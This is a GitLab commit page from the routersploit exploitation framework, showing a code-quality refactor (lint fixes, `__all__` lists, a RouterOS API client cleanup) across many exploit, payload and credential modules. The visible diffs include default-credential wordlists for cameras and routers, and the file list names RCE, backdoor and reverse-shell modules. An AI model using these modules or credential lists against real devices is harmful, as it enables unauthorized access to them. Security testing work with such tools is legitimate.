Skip to content
Projects
Groups
Snippets
Help
This project
Loading...
Sign in / Register
Toggle navigation
R
routersploit
Overview
Overview
Details
Activity
Cycle Analytics
Repository
Repository
Files
Commits
Branches
Tags
Contributors
Graph
Compare
Charts
Issues
0
Issues
0
List
Board
Labels
Milestones
Merge Requests
0
Merge Requests
0
CI / CD
CI / CD
Pipelines
Jobs
Schedules
Charts
Wiki
Wiki
Snippets
Snippets
Members
Members
Collapse sidebar
Close sidebar
Activity
Graph
Charts
Create a new issue
Jobs
Commits
Issue Boards
Open sidebar
czos-dpend
routersploit
Commits
62b83fb4
Unverified
Commit
62b83fb4
authored
May 27, 2018
by
Marcin Bury
Committed by
GitHub
May 27, 2018
Browse files
Options
Browse Files
Download
Email Patches
Plain Diff
Improving code quality (#435)
parent
2ee21d01
Show whitespace changes
Inline
Side-by-side
Showing
140 changed files
with
203 additions
and
211 deletions
+203
-211
__init__.py
routersploit/core/bluetooth/btle/__init__.py
+7
-0
btle_device.py
routersploit/core/bluetooth/btle/btle_device.py
+2
-2
btle_scanner.py
routersploit/core/bluetooth/btle/btle_scanner.py
+2
-1
__init__.py
routersploit/core/exploit/__init__.py
+24
-1
exploit.py
routersploit/core/exploit/exploit.py
+0
-5
option.py
routersploit/core/exploit/option.py
+0
-0
utils.py
routersploit/core/exploit/utils.py
+0
-0
ftp_client.py
routersploit/core/ftp/ftp_client.py
+0
-0
http_client.py
routersploit/core/http/http_client.py
+0
-1
snmp_client.py
routersploit/core/snmp/snmp_client.py
+0
-0
ssh_client.py
routersploit/core/ssh/ssh_client.py
+1
-1
tcp_client.py
routersploit/core/tcp/tcp_client.py
+0
-0
telnet_client.py
routersploit/core/telnet/telnet_client.py
+0
-0
udp_client.py
routersploit/core/udp/udp_client.py
+0
-0
interpreter.py
routersploit/interpreter.py
+1
-1
apiros_client.py
routersploit/libs/apiros/apiros_client.py
+48
-39
lzs.py
routersploit/libs/lzs/lzs.py
+0
-1
ssh_default_creds.py
...rsploit/modules/creds/cameras/basler/ssh_default_creds.py
+0
-0
ssh_default_creds.py
...ersploit/modules/creds/cameras/canon/ssh_default_creds.py
+0
-0
webinterface_http_auth_default_creds.py
...eds/cameras/canon/webinterface_http_auth_default_creds.py
+0
-0
ftp_default_creds.py
...ersploit/modules/creds/cameras/cisco/ftp_default_creds.py
+0
-2
ssh_default_creds.py
...ersploit/modules/creds/cameras/dlink/ssh_default_creds.py
+0
-1
ftp_default_creds.py
...loit/modules/creds/cameras/geovision/ftp_default_creds.py
+0
-1
ftp_default_creds.py
...sploit/modules/creds/cameras/mobotix/ftp_default_creds.py
+0
-0
ssh_default_creds.py
...sploit/modules/creds/cameras/mobotix/ssh_default_creds.py
+0
-0
ssh_default_creds.py
...sploit/modules/creds/cameras/siemens/ssh_default_creds.py
+0
-0
ssh_default_creds.py
...ersploit/modules/creds/cameras/speco/ssh_default_creds.py
+0
-0
ftp_default_creds.py
...rsploit/modules/creds/cameras/vacron/ftp_default_creds.py
+0
-0
ftp_default_creds.py
...sploit/modules/creds/cameras/videoiq/ftp_default_creds.py
+0
-1
ssh_default_creds.py
...sploit/modules/creds/cameras/videoiq/ssh_default_creds.py
+0
-1
ftp_default.py
routersploit/modules/creds/generic/ftp_default.py
+0
-0
http_basic_digest_bruteforce.py
...oit/modules/creds/generic/http_basic_digest_bruteforce.py
+0
-0
http_basic_digest_default.py
...sploit/modules/creds/generic/http_basic_digest_default.py
+0
-0
snmp_bruteforce.py
routersploit/modules/creds/generic/snmp_bruteforce.py
+0
-0
ssh_default.py
routersploit/modules/creds/generic/ssh_default.py
+0
-0
telnet_bruteforce.py
routersploit/modules/creds/generic/telnet_bruteforce.py
+0
-0
telnet_default.py
routersploit/modules/creds/generic/telnet_default.py
+0
-0
telnet_default_creds.py
...ploit/modules/creds/routers/asmax/telnet_default_creds.py
+0
-1
ftp_default_creds.py
...rsploit/modules/creds/routers/belkin/ftp_default_creds.py
+0
-1
ssh_default_creds.py
...ploit/modules/creds/routers/fortinet/ssh_default_creds.py
+0
-0
telnet_default_creds.py
...loit/modules/creds/routers/huawei/telnet_default_creds.py
+0
-0
ssh_default_creds.py
...rsploit/modules/creds/routers/ipfire/ssh_default_creds.py
+0
-0
telnet_default_creds.py
...loit/modules/creds/routers/ipfire/telnet_default_creds.py
+0
-1
ssh_default_creds.py
...sploit/modules/creds/routers/juniper/ssh_default_creds.py
+0
-0
api_ros_default_creds.py
...t/modules/creds/routers/mikrotik/api_ros_default_creds.py
+0
-0
ssh_default_creds.py
...ploit/modules/creds/routers/movistar/ssh_default_creds.py
+0
-0
ssh_default_creds.py
...sploit/modules/creds/routers/netcore/ssh_default_creds.py
+0
-0
telnet_default_creds.py
...oit/modules/creds/routers/netcore/telnet_default_creds.py
+0
-0
ssh_default_creds.py
...sploit/modules/creds/routers/netgear/ssh_default_creds.py
+0
-0
telnet_default_creds.py
...oit/modules/creds/routers/netgear/telnet_default_creds.py
+0
-0
ftp_default_creds.py
...rsploit/modules/creds/routers/netsys/ftp_default_creds.py
+0
-0
ssh_default_creds.py
...rsploit/modules/creds/routers/netsys/ssh_default_creds.py
+0
-0
telnet_default_creds.py
...loit/modules/creds/routers/netsys/telnet_default_creds.py
+0
-0
webinterface_http_form_default_creds.py
...s/routers/pfsense/webinterface_http_form_default_creds.py
+1
-5
ssh_default_creds.py
...it/modules/creds/routers/technicolor/ssh_default_creds.py
+0
-0
telnet_default_creds.py
...modules/creds/routers/technicolor/telnet_default_creds.py
+0
-0
telnet_default_creds.py
...oit/modules/creds/routers/thomson/telnet_default_creds.py
+0
-0
ssh_default_creds.py
...rsploit/modules/creds/routers/tplink/ssh_default_creds.py
+0
-0
telnet_default_creds.py
...loit/modules/creds/routers/tplink/telnet_default_creds.py
+0
-0
ssh_default_creds.py
...ploit/modules/creds/routers/ubiquiti/ssh_default_creds.py
+0
-1
telnet_default_creds.py
...it/modules/creds/routers/ubiquiti/telnet_default_creds.py
+0
-0
ssh_default_creds.py
routersploit/modules/creds/routers/zte/ssh_default_creds.py
+0
-0
telnet_default_creds.py
...rsploit/modules/creds/routers/zte/telnet_default_creds.py
+0
-0
ssh_default_creds.py
...ersploit/modules/creds/routers/zyxel/ssh_default_creds.py
+0
-0
telnet_default_creds.py
...ploit/modules/creds/routers/zyxel/telnet_default_creds.py
+0
-0
dcs_930l_932l_auth_bypass.py
...dules/exploits/cameras/dlink/dcs_930l_932l_auth_bypass.py
+1
-3
gxv3611hd_ip_camera_backdoor.py
...loits/cameras/grandstream/gxv3611hd_ip_camera_backdoor.py
+0
-1
P2P_wificam_credential_disclosure.py
...ploits/cameras/multi/P2P_wificam_credential_disclosure.py
+0
-1
jvc_vanderbilt_honeywell_path_traversal.py
.../cameras/multi/jvc_vanderbilt_honeywell_path_traversal.py
+0
-0
netwave_ip_camera_information_disclosure.py
...cameras/multi/netwave_ip_camera_information_disclosure.py
+1
-1
heartbleed.py
routersploit/modules/exploits/generic/heartbleed.py
+7
-7
shellshock.py
routersploit/modules/exploits/generic/shellshock.py
+0
-4
gateway_auth_bypass.py
...oit/modules/exploits/routers/2wire/gateway_auth_bypass.py
+0
-2
imc_info_disclosure.py
...loit/modules/exploits/routers/3com/imc_info_disclosure.py
+0
-0
officeconnect_rce.py
...sploit/modules/exploits/routers/3com/officeconnect_rce.py
+0
-0
billion_7700nr4_password_disclosure.py
...ts/routers/billion/billion_7700nr4_password_disclosure.py
+1
-1
catalyst_2960_rocem.py
...oit/modules/exploits/routers/cisco/catalyst_2960_rocem.py
+2
-2
firepower_management60_path_traversal.py
...ts/routers/cisco/firepower_management60_path_traversal.py
+0
-0
firepower_management60_rce.py
...ules/exploits/routers/cisco/firepower_management60_rce.py
+0
-3
ct_5361t_password_disclosure.py
...exploits/routers/comtrend/ct_5361t_password_disclosure.py
+1
-1
dcs_930l_auth_rce.py
...ploit/modules/exploits/routers/dlink/dcs_930l_auth_rce.py
+0
-0
dir_300_645_815_upnp_rce.py
...odules/exploits/routers/dlink/dir_300_645_815_upnp_rce.py
+1
-1
dir_815_850l_rce.py
...sploit/modules/exploits/routers/dlink/dir_815_850l_rce.py
+1
-0
dir_850l_creds_disclosure.py
...dules/exploits/routers/dlink/dir_850l_creds_disclosure.py
+0
-1
dns_320l_327l_rce.py
...ploit/modules/exploits/routers/dlink/dns_320l_327l_rce.py
+0
-0
dsl_2750b_info_disclosure.py
...dules/exploits/routers/dlink/dsl_2750b_info_disclosure.py
+0
-0
dsl_2750b_rce.py
routersploit/modules/exploits/routers/dlink/dsl_2750b_rce.py
+0
-0
dsp_w110_rce.py
routersploit/modules/exploits/routers/dlink/dsp_w110_rce.py
+0
-0
dvg_n5402sp_path_traversal.py
...ules/exploits/routers/dlink/dvg_n5402sp_path_traversal.py
+0
-0
dwl_3200ap_password_disclosure.py
.../exploits/routers/dlink/dwl_3200ap_password_disclosure.py
+0
-1
dwr_932b_backdoor.py
...ploit/modules/exploits/routers/dlink/dwr_932b_backdoor.py
+3
-3
multi_hedwig_cgi_exec.py
...t/modules/exploits/routers/dlink/multi_hedwig_cgi_exec.py
+0
-0
multi_hnap_rce.py
...ersploit/modules/exploits/routers/dlink/multi_hnap_rce.py
+1
-0
fortigate_os_backdoor.py
...odules/exploits/routers/fortinet/fortigate_os_backdoor.py
+6
-6
e5331_mifi_info_disclosure.py
...les/exploits/routers/huawei/e5331_mifi_info_disclosure.py
+0
-0
hg520_info_dislosure.py
...t/modules/exploits/routers/huawei/hg520_info_dislosure.py
+2
-2
ipfire_oinkcode_rce.py
...it/modules/exploits/routers/ipfire/ipfire_oinkcode_rce.py
+2
-2
routeros_jailbreak.py
...t/modules/exploits/routers/mikrotik/routeros_jailbreak.py
+0
-0
gpon_home_gateway_rce.py
...t/modules/exploits/routers/multi/gpon_home_gateway_rce.py
+0
-0
misfortune_cookie.py
...ploit/modules/exploits/routers/multi/misfortune_cookie.py
+3
-3
rom0.py
routersploit/modules/exploits/routers/multi/rom0.py
+0
-0
tc7200_password_disclosure_v2.py
...oits/routers/technicolor/tc7200_password_disclosure_v2.py
+2
-2
tg784_authbypass.py
.../modules/exploits/routers/technicolor/tg784_authbypass.py
+0
-2
twg849_info_disclosure.py
...odules/exploits/routers/thomson/twg849_info_disclosure.py
+0
-0
wdr842nd_wdr842n_configure_disclosure.py
...s/routers/tplink/wdr842nd_wdr842n_configure_disclosure.py
+4
-4
zxv10_rce.py
routersploit/modules/exploits/routers/zte/zxv10_rce.py
+4
-5
p660hn_t_v2_rce.py
...rsploit/modules/exploits/routers/zyxel/p660hn_t_v2_rce.py
+1
-1
btle_write.py
routersploit/modules/generic/bluetooth/btle_write.py
+0
-1
__init__.py
routersploit/modules/payloads/__init__.py
+0
-1
bind_tcp.py
routersploit/modules/payloads/perl/bind_tcp.py
+0
-1
reverse_tcp.py
routersploit/modules/payloads/perl/reverse_tcp.py
+0
-1
reverse_tcp.py
routersploit/modules/payloads/php/reverse_tcp.py
+0
-1
bind_tcp.py
routersploit/modules/payloads/python/bind_tcp.py
+0
-1
reverse_tcp.py
routersploit/modules/payloads/python/reverse_tcp.py
+0
-1
autopwn.py
routersploit/modules/scanners/autopwn.py
+0
-0
rsf.py
rsf.py
+1
-0
conftest.py
tests/conftest.py
+2
-4
test_webinterface_default_creds.py
...s/creds/cameras/basler/test_webinterface_default_creds.py
+0
-1
test_ftp_bruteforce.py
tests/creds/generic/test_ftp_bruteforce.py
+0
-1
test_corp_network_cameras_conf_disclosure.py
...ras/brickcom/test_corp_network_cameras_conf_disclosure.py
+1
-1
test_users_cgi_creds_disclosure.py
...loits/cameras/brickcom/test_users_cgi_creds_disclosure.py
+23
-24
test_dcs_930l_932l_auth_bypass.py
.../exploits/cameras/dlink/test_dcs_930l_932l_auth_bypass.py
+1
-1
test_dvr_creds_disclosure.py
tests/exploits/cameras/multi/test_dvr_creds_disclosure.py
+0
-1
test_dvr_jaws_rce.py
tests/exploits/cameras/mvpower/test_dvr_jaws_rce.py
+0
-0
test_dir_645_password_disclosure.py
...xploits/routers/dlink/test_dir_645_password_disclosure.py
+0
-0
test_dir_850l_creds_disclosure.py
.../exploits/routers/dlink/test_dir_850l_creds_disclosure.py
+31
-31
test_dir_8xx_password_disclosure.py
...xploits/routers/dlink/test_dir_8xx_password_disclosure.py
+0
-0
test_smartwifi_password_disclosure.py
...its/routers/linksys/test_smartwifi_password_disclosure.py
+1
-1
test_gpon_home_gateway_rce.py
tests/exploits/routers/multi/test_gpon_home_gateway_rce.py
+3
-2
test_rom0.py
tests/exploits/routers/multi/test_rom0.py
+1
-0
test_tc7200_password_disclosure_v2.py
...routers/technicolor/test_tc7200_password_disclosure_v2.py
+5
-2
test_twg850_password_disclosure.py
...ploits/routers/thomson/test_twg850_password_disclosure.py
+0
-0
test_wdr740nd_wdr740n_backdoor.py
...exploits/routers/tplink/test_wdr740nd_wdr740n_backdoor.py
+1
-1
test_d1000_rce.py
tests/exploits/routers/zyxel/test_d1000_rce.py
+0
-0
test_d1000_wifi_password_disclosure.py
...oits/routers/zyxel/test_d1000_wifi_password_disclosure.py
+0
-1
test_p660hn_t_v1_rce.py
tests/exploits/routers/zyxel/test_p660hn_t_v1_rce.py
+0
-1
test_p660hn_t_v2_rce.py
tests/exploits/routers/zyxel/test_p660hn_t_v2_rce.py
+0
-1
test_zywall_usg_extract_hashes.py
.../exploits/routers/zyxel/test_zywall_usg_extract_hashes.py
+0
-1
test_exploit_scenarios.py
tests/test_exploit_scenarios.py
+2
-2
test_module_info.py
tests/test_module_info.py
+2
-2
No files found.
routersploit/core/bluetooth/btle/__init__.py
View file @
62b83fb4
...
...
@@ -5,3 +5,10 @@ from .btle_scanner import (
BTLEScanner
,
ScanDelegate
)
__all__
=
[
"Device"
,
"BTLEScanner"
,
"ScanDelegate"
,
]
routersploit/core/bluetooth/btle/btle_device.py
View file @
62b83fb4
...
...
@@ -120,7 +120,7 @@ class Device(ScanEntry):
for
_
,
c
in
enumerate
(
service
.
getCharacteristics
()):
if
str
(
c
.
uuid
)
==
characteristic
:
char
=
c
char
=
c
break
if
char
:
...
...
@@ -221,7 +221,7 @@ class Device(ScanEntry):
try
:
string
=
color_blue
(
repr
(
data
.
decode
(
"utf-8"
)))
except
Exception
:
st
ir
ng
=
repr
(
data
)
st
ri
ng
=
repr
(
data
)
except
Exception
:
pass
...
...
routersploit/core/bluetooth/btle/btle_scanner.py
View file @
62b83fb4
...
...
@@ -13,7 +13,7 @@ class BTLEScanner(Scanner):
def
_decode_address
(
self
,
resp
):
addr
=
binascii
.
b2a_hex
(
resp
[
"addr"
][
0
])
.
decode
(
"utf-8"
)
return
":"
.
join
([
addr
[
i
:
i
+
2
]
for
i
in
range
(
0
,
12
,
2
)])
return
":"
.
join
([
addr
[
i
:
i
+
2
]
for
i
in
range
(
0
,
12
,
2
)])
def
_find_or_create
(
self
,
addr
):
if
addr
in
self
.
scanned
:
...
...
@@ -59,6 +59,7 @@ class BTLEScanner(Scanner):
if
self
.
mac
and
dev
.
addr
==
self
.
mac
:
break
class
ScanDelegate
(
DefaultDelegate
):
def
__init__
(
self
,
options
):
DefaultDelegate
.
__init__
(
self
)
...
...
routersploit/core/exploit/__init__.py
View file @
62b83fb4
...
...
@@ -24,5 +24,28 @@ from routersploit.core.exploit.printer import (
print_table
,
)
import
routersploit.core.exploit.
utils
from
routersploit.core.exploit
import
utils
from
routersploit.core.exploit.shell
import
shell
__all__
=
[
"Exploit"
,
"multi"
,
"mute"
,
"LockedIterator"
,
"OptIP"
,
"OptPort"
,
"OptInteger"
,
"OptFloat"
,
"OptBool"
,
"OptString"
,
"OptMAC"
,
"OptWordlist"
,
"print_info"
,
"print_status"
,
"print_success"
,
"print_error"
,
"print_table"
,
"utils"
,
"shell"
,
]
routersploit/core/exploit/exploit.py
View file @
62b83fb4
import
os
import
threading
import
time
import
concurrent.futures
from
future.utils
import
with_metaclass
,
iteritems
from
itertools
import
chain
from
functools
import
wraps
from
routersploit.core.exploit.printer
import
(
print_status
,
print_error
,
thread_output_stream
,
)
from
routersploit.core.exploit.option
import
Option
...
...
@@ -66,7 +64,6 @@ class Exploit(BaseExploit):
target_protocol
=
"custom"
def
run
(
self
):
raise
NotImplementedError
(
"You have to define your own 'run' method."
)
...
...
@@ -204,5 +201,3 @@ class Protocol:
HTTP
=
"http"
HTTPS
=
"https"
SNMP
=
"snmp"
routersploit/core/exploit/option.py
View file @
62b83fb4
routersploit/core/exploit/utils.py
View file @
62b83fb4
routersploit/core/ftp/ftp_client.py
View file @
62b83fb4
routersploit/core/http/http_client.py
View file @
62b83fb4
...
...
@@ -21,7 +21,6 @@ class HTTPClient(Exploit):
verbosity
=
OptBool
(
"true"
,
"Verbosity enabled: true/false"
)
ssl
=
OptBool
(
"false"
,
"SSL enabled: true/false"
)
def
http_request
(
self
,
method
,
path
,
session
=
requests
,
**
kwargs
):
if
self
.
ssl
:
url
=
"https://"
...
...
routersploit/core/snmp/snmp_client.py
View file @
62b83fb4
routersploit/core/ssh/ssh_client.py
View file @
62b83fb4
...
...
@@ -156,7 +156,7 @@ class SSHClient(Exploit):
break
chan
.
send
(
x
)
finally
:
termios
.
tcsetattr
(
sys
.
stdin
,
termios
.
TCSADRAIN
,
oldtty
)
termios
.
tcsetattr
(
sys
.
stdin
,
termios
.
TCSADRAIN
,
oldtty
)
return
def
_windows_shell
(
self
,
chan
):
...
...
routersploit/core/tcp/tcp_client.py
View file @
62b83fb4
routersploit/core/telnet/telnet_client.py
View file @
62b83fb4
routersploit/core/udp/udp_client.py
View file @
62b83fb4
routersploit/interpreter.py
View file @
62b83fb4
...
...
@@ -333,7 +333,7 @@ class RoutersploitInterpreter(BaseInterpreter):
except
KeyboardInterrupt
:
print_info
()
print_error
(
"Operation cancelled by user"
)
except
:
except
Exception
:
print_error
(
traceback
.
format_exc
(
sys
.
exc_info
()))
def
command_exploit
(
self
,
*
args
,
**
kwargs
):
...
...
routersploit/libs/apiros/apiros_client.py
View file @
62b83fb4
import
sys
import
time
import
binascii
import
hashlib
class
ApiRosClient
(
object
):
"Routeros api"
"RouterOS API"
def
__init__
(
self
,
sk
):
self
.
sk
=
sk
self
.
currenttag
=
0
...
...
@@ -17,16 +17,21 @@ class ApiRosClient(object):
md
.
update
(
b
'
\x00
'
)
md
.
update
(
pwd
.
encode
(
'UTF-8'
))
md
.
update
(
chal
)
output
=
self
.
talk
([
"/login"
,
"=name="
+
username
,
"=response=00"
+
binascii
.
hexlify
(
md
.
digest
())
.
decode
(
'UTF-8'
)
])
output
=
self
.
talk
([
"/login"
,
"=name="
+
username
,
"=response=00"
+
binascii
.
hexlify
(
md
.
digest
())
.
decode
(
'UTF-8'
)
])
return
output
def
talk
(
self
,
words
):
if
self
.
writeSentence
(
words
)
==
0
:
return
if
self
.
writeSentence
(
words
)
==
0
:
return
r
=
[]
while
1
:
i
=
self
.
readSentence
();
if
len
(
i
)
==
0
:
continue
i
=
self
.
readSentence
()
if
len
(
i
)
==
0
:
continue
reply
=
i
[
0
]
attrs
=
{}
for
w
in
i
[
1
:]:
...
...
@@ -34,9 +39,10 @@ class ApiRosClient(object):
if
(
j
==
-
1
):
attrs
[
w
]
=
''
else
:
attrs
[
w
[:
j
]]
=
w
[
j
+
1
:]
attrs
[
w
[:
j
]]
=
w
[
j
+
1
:]
r
.
append
((
reply
,
attrs
))
if
reply
==
'!done'
:
return
r
if
reply
==
'!done'
:
return
r
def
writeSentence
(
self
,
words
):
ret
=
0
...
...
@@ -50,7 +56,8 @@ class ApiRosClient(object):
r
=
[]
while
1
:
w
=
self
.
readWord
()
if
w
==
''
:
return
r
if
w
==
''
:
return
r
r
.
append
(
w
)
def
writeWord
(
self
,
w
):
...
...
@@ -61,31 +68,30 @@ class ApiRosClient(object):
ret
=
self
.
readStr
(
self
.
readLen
())
return
ret
def
writeLen
(
self
,
l
):
if
l
<
0x80
:
self
.
writeByte
((
l
)
.
to_bytes
(
1
,
sys
.
byteorder
))
elif
l
<
0x4000
:
l
|=
0x8000
tmp
=
(
l
>>
8
)
&
0xFF
self
.
writeByte
(((
l
>>
8
)
&
0xFF
)
.
to_bytes
(
1
,
sys
.
byteorder
))
self
.
writeByte
((
l
&
0xFF
)
.
to_bytes
(
1
,
sys
.
byteorder
))
elif
l
<
0x200000
:
l
|=
0xC00000
self
.
writeByte
(((
l
>>
16
)
&
0xFF
)
.
to_bytes
(
1
,
sys
.
byteorder
))
self
.
writeByte
(((
l
>>
8
)
&
0xFF
)
.
to_bytes
(
1
,
sys
.
byteorder
))
self
.
writeByte
((
l
&
0xFF
)
.
to_bytes
(
1
,
sys
.
byteorder
))
elif
l
<
0x10000000
:
l
|=
0xE0000000
self
.
writeByte
(((
l
>>
24
)
&
0xFF
)
.
to_bytes
(
1
,
sys
.
byteorder
))
self
.
writeByte
(((
l
>>
16
)
&
0xFF
)
.
to_bytes
(
1
,
sys
.
byteorder
))
self
.
writeByte
(((
l
>>
8
)
&
0xFF
)
.
to_bytes
(
1
,
sys
.
byteorder
))
self
.
writeByte
((
l
&
0xFF
)
.
to_bytes
(
1
,
sys
.
byteorder
))
def
writeLen
(
self
,
length
):
if
length
<
0x80
:
self
.
writeByte
((
length
)
.
to_bytes
(
1
,
sys
.
byteorder
))
elif
length
<
0x4000
:
length
|=
0x8000
self
.
writeByte
(((
length
>>
8
)
&
0xFF
)
.
to_bytes
(
1
,
sys
.
byteorder
))
self
.
writeByte
((
length
&
0xFF
)
.
to_bytes
(
1
,
sys
.
byteorder
))
elif
length
<
0x200000
:
length
|=
0xC00000
self
.
writeByte
(((
length
>>
16
)
&
0xFF
)
.
to_bytes
(
1
,
sys
.
byteorder
))
self
.
writeByte
(((
length
>>
8
)
&
0xFF
)
.
to_bytes
(
1
,
sys
.
byteorder
))
self
.
writeByte
((
length
&
0xFF
)
.
to_bytes
(
1
,
sys
.
byteorder
))
elif
length
<
0x10000000
:
length
|=
0xE0000000
self
.
writeByte
(((
length
>>
24
)
&
0xFF
)
.
to_bytes
(
1
,
sys
.
byteorder
))
self
.
writeByte
(((
length
>>
16
)
&
0xFF
)
.
to_bytes
(
1
,
sys
.
byteorder
))
self
.
writeByte
(((
length
>>
8
)
&
0xFF
)
.
to_bytes
(
1
,
sys
.
byteorder
))
self
.
writeByte
((
length
&
0xFF
)
.
to_bytes
(
1
,
sys
.
byteorder
))
else
:
self
.
writeByte
((
0xF0
)
.
to_bytes
(
1
,
sys
.
byteorder
))
self
.
writeByte
(((
l
>>
24
)
&
0xFF
)
.
to_bytes
(
1
,
sys
.
byteorder
))
self
.
writeByte
(((
l
>>
16
)
&
0xFF
)
.
to_bytes
(
1
,
sys
.
byteorder
))
self
.
writeByte
(((
l
>>
8
)
&
0xFF
)
.
to_bytes
(
1
,
sys
.
byteorder
))
self
.
writeByte
((
l
&
0xFF
)
.
to_bytes
(
1
,
sys
.
byteorder
))
self
.
writeByte
(((
l
ength
>>
24
)
&
0xFF
)
.
to_bytes
(
1
,
sys
.
byteorder
))
self
.
writeByte
(((
l
ength
>>
16
)
&
0xFF
)
.
to_bytes
(
1
,
sys
.
byteorder
))
self
.
writeByte
(((
l
ength
>>
8
)
&
0xFF
)
.
to_bytes
(
1
,
sys
.
byteorder
))
self
.
writeByte
((
l
ength
&
0xFF
)
.
to_bytes
(
1
,
sys
.
byteorder
))
def
readLen
(
self
):
c
=
ord
(
self
.
readStr
(
1
))
...
...
@@ -120,24 +126,27 @@ class ApiRosClient(object):
return
c
def
writeStr
(
self
,
str
):
n
=
0
;
n
=
0
while
n
<
len
(
str
):
r
=
self
.
sk
.
send
(
bytes
(
str
[
n
:],
'UTF-8'
))
if
r
==
0
:
raise
RuntimeError
(
"connection closed by remote end"
)
if
r
==
0
:
raise
RuntimeError
(
"connection closed by remote end"
)
n
+=
r
def
writeByte
(
self
,
str
):
n
=
0
;
n
=
0
while
n
<
len
(
str
):
r
=
self
.
sk
.
send
(
str
[
n
:])
if
r
==
0
:
raise
RuntimeError
(
"connection closed by remote end"
)
if
r
==
0
:
raise
RuntimeError
(
"connection closed by remote end"
)
n
+=
r
def
readStr
(
self
,
length
):
ret
=
''
while
len
(
ret
)
<
length
:
s
=
self
.
sk
.
recv
(
length
-
len
(
ret
))
if
s
==
''
:
raise
RuntimeError
(
"connection closed by remote end"
)
if
s
==
''
:
raise
RuntimeError
(
"connection closed by remote end"
)
ret
+=
s
.
decode
(
'UTF-8'
,
'replace'
)
return
ret
routersploit/libs/lzs/lzs.py
View file @
62b83fb4
...
...
@@ -20,7 +20,6 @@
#
##############################################################
import
sys
import
collections
...
...
routersploit/modules/creds/cameras/basler/ssh_default_creds.py
View file @
62b83fb4
routersploit/modules/creds/cameras/canon/ssh_default_creds.py
View file @
62b83fb4
routersploit/modules/creds/cameras/canon/webinterface_http_auth_default_creds.py
View file @
62b83fb4
routersploit/modules/creds/cameras/cisco/ftp_default_creds.py
View file @
62b83fb4
...
...
@@ -19,5 +19,3 @@ class Exploit(FTPDefault):
threads
=
OptInteger
(
1
,
"Number of threads"
)
defaults
=
OptWordlist
(
"admin:admin"
,
"User:Pass or file with default credentials (file://)"
)
routersploit/modules/creds/cameras/dlink/ssh_default_creds.py
View file @
62b83fb4
...
...
@@ -20,4 +20,3 @@ class Exploit(SSHDefault):
threads
=
OptInteger
(
1
,
"Number of threads"
)
defaults
=
OptWordlist
(
"admin:admin"
,
"User:Pass or file with default credentials (file://)"
)
routersploit/modules/creds/cameras/geovision/ftp_default_creds.py
View file @
62b83fb4
...
...
@@ -20,4 +20,3 @@ class Exploit(FTPDefault):
threads
=
OptInteger
(
1
,
"Number of threads"
)
defaults
=
OptWordlist
(
"admin:admin"
,
"User:Pass or file with default credentials (file://)"
)
routersploit/modules/creds/cameras/mobotix/ftp_default_creds.py
View file @
62b83fb4
routersploit/modules/creds/cameras/mobotix/ssh_default_creds.py
View file @
62b83fb4
routersploit/modules/creds/cameras/siemens/ssh_default_creds.py
View file @
62b83fb4
routersploit/modules/creds/cameras/speco/ssh_default_creds.py
View file @
62b83fb4
routersploit/modules/creds/cameras/vacron/ftp_default_creds.py
View file @
62b83fb4
routersploit/modules/creds/cameras/videoiq/ftp_default_creds.py
View file @
62b83fb4
...
...
@@ -20,4 +20,3 @@ class Exploit(FTPDefault):
threads
=
OptInteger
(
1
,
"Number of threads"
)
defaults
=
OptWordlist
(
"supervisor:supervisor"
,
"User:Pass or file with default credentials (file://)"
)
routersploit/modules/creds/cameras/videoiq/ssh_default_creds.py
View file @
62b83fb4
...
...
@@ -20,4 +20,3 @@ class Exploit(SSHDefault):
threads
=
OptInteger
(
1
,
"Number of threads"
)
default
=
OptWordlist
(
"supervistor:supervisor"
,
"User:Pass or file with default credentials (file://)"
)
routersploit/modules/creds/generic/ftp_default.py
View file @
62b83fb4
routersploit/modules/creds/generic/http_basic_digest_bruteforce.py
View file @
62b83fb4
routersploit/modules/creds/generic/http_basic_digest_default.py
View file @
62b83fb4
routersploit/modules/creds/generic/snmp_bruteforce.py
View file @
62b83fb4
routersploit/modules/creds/generic/ssh_default.py
View file @
62b83fb4
routersploit/modules/creds/generic/telnet_bruteforce.py
View file @
62b83fb4
routersploit/modules/creds/generic/telnet_default.py
View file @
62b83fb4
routersploit/modules/creds/routers/asmax/telnet_default_creds.py
View file @
62b83fb4
...
...
@@ -20,4 +20,3 @@ class Exploit(TelnetDefault):
threads
=
OptInteger
(
1
,
"Number of threads"
)
defaults
=
OptWordlist
(
"admin:admin,support:support,user:user"
,
"User:Pass or file with default credentials (file://)"
)
routersploit/modules/creds/routers/belkin/ftp_default_creds.py
View file @
62b83fb4
...
...
@@ -20,4 +20,3 @@ class Exploit(FTPDefault):
threads
=
OptInteger
(
1
,
"Number of threads"
)
defaults
=
OptWordlist
(
"admin:admin,admin:password"
,
"User:Pass or file with default credentials (file://)"
)
routersploit/modules/creds/routers/fortinet/ssh_default_creds.py
View file @
62b83fb4
routersploit/modules/creds/routers/huawei/telnet_default_creds.py
View file @
62b83fb4
routersploit/modules/creds/routers/ipfire/ssh_default_creds.py
View file @
62b83fb4
routersploit/modules/creds/routers/ipfire/telnet_default_creds.py
View file @
62b83fb4
...
...
@@ -15,7 +15,6 @@ class Exploit(TelnetDefault):
),
}
target
=
OptIP
(
""
,
"Target IPv4, IPv6 address or file with ip:port (file://)"
)
port
=
OptPort
(
23
,
"Target Telnet port"
)
...
...
routersploit/modules/creds/routers/juniper/ssh_default_creds.py
View file @
62b83fb4
routersploit/modules/creds/routers/mikrotik/api_ros_default_creds.py
View file @
62b83fb4
routersploit/modules/creds/routers/movistar/ssh_default_creds.py
View file @
62b83fb4
routersploit/modules/creds/routers/netcore/ssh_default_creds.py
View file @
62b83fb4
routersploit/modules/creds/routers/netcore/telnet_default_creds.py
View file @
62b83fb4
routersploit/modules/creds/routers/netgear/ssh_default_creds.py
View file @
62b83fb4
routersploit/modules/creds/routers/netgear/telnet_default_creds.py
View file @
62b83fb4
routersploit/modules/creds/routers/netsys/ftp_default_creds.py
View file @
62b83fb4
routersploit/modules/creds/routers/netsys/ssh_default_creds.py
View file @
62b83fb4
routersploit/modules/creds/routers/netsys/telnet_default_creds.py
View file @
62b83fb4
routersploit/modules/creds/routers/pfsense/webinterface_http_form_default_creds.py
View file @
62b83fb4
import
re
from
routersploit.core.exploit
import
*
from
routersploit.core.http.http_client
import
HTTPClient
...
...
@@ -48,7 +47,6 @@ class Exploit(HTTPClient):
def
target_function
(
self
,
data
):
username
,
password
=
data
.
split
(
":"
)
def
check
(
self
):
response
=
self
.
http_request
(
method
=
"GET"
,
...
...
@@ -57,9 +55,7 @@ class Exploit(HTTPClient):
if
response
is
None
:
return
False
if
all
([
x
in
response
.
text
for
x
in
[
